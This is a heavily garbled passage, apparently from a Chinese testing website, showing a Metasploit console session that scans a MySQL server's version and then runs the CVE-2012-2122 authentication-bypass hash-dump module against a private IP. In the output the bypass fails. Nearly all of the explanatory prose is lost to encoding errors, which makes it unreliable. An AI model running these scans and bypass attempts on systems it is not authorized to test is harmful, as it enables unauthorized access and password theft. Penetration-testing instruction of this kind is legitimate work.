????λ?????????? >> ??????????
??Metasploit???Mysql???????????
???????????? ???????[ 2016/1/11 13:55:46 ] ????????mysql ?????
???????????????????Mysql?5.1.61?? 5.2.11?? 5.3.5?? 5.5.22???????(???????????????????????汾?????????汾)
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_version) > set THREADS 5
THREADS => 5
msf auxiliary(mysql_version) > exploit
[*] 10.199.128.61:3306 is running MySQL 5.5.44-log (protocol 10)
[*] Scanned 1 of 1 hosts ( complete)
[*] Auxiliary module execution completed
?????????????mysql version?????????????Mysql??IP???????exploit??(???????IP????????ж????????????????)
msf auxiliary(mysql_hashdump) > search CVE-2012-2122
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump
msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME root yes The username to authenticate as
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_authbypass_hashdump) > exploit
[+] 10.199.128.61:3306 The server allows logins?? proceeding with bypass test
[*] 10.199.128.61:3306 Authentication bypass is 10% complete
[*] 10.199.128.61:3306 Authentication bypass is 20% complete
[*] 10.199.128.61:3306 Authentication bypass is 30% complete
[*] 10.199.128.61:3306 Authentication bypass is 40% complete
[*] 10.199.128.61:3306 Authentication bypass is 50% complete
[*] 10.199.128.61:3306 Authentication bypass is 60% complete
[*] 10.199.128.61:3306 Authentication bypass is 70% complete
[*] 10.199.128.61:3306 Authentication bypass is 80% complete
[*] 10.199.128.61:3306 Authentication bypass is 90% complete
[*] 10.199.128.61:3306 Authentication bypass is complete
[-] 10.199.128.61:3306 Unable to bypass authentication?? this target may not be vulnerable
[*] Scanned 1 of 1 hosts ( complete)
[*] Auxiliary module execution completed
?????????????????????????????????????
????-------------------
????????????????????????????????????????????IP???????????????????????????????????????????????????????
???????????????????????漰???????????????????SPASVOС??(021-61079698-8054)?????????????????????????
??????
???????????????????Щ???????????????????????????2017?????????????????????AutoRunner???????????????2016??1??8??V4.0?汾?????????????????????TestDirector?淶??????????WinRunner????????????????????WinRunner???????????????Winrunner TSL????????????????WinRunner?????????????????????????WinRunner?????????????????WinRunner???????????????????????????????????????????VectorCAST-?????????????????????????????????е??????????????????????????????????????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11????????
?????????App Bug???????????????????????Jmeter?????????QC??????APP????????????????app?????е????????jenkins+testng+ant+webdriver??????????????JMeter????HTTP???????Selenium 2.0 WebDriver ??????
sales@spasvo.com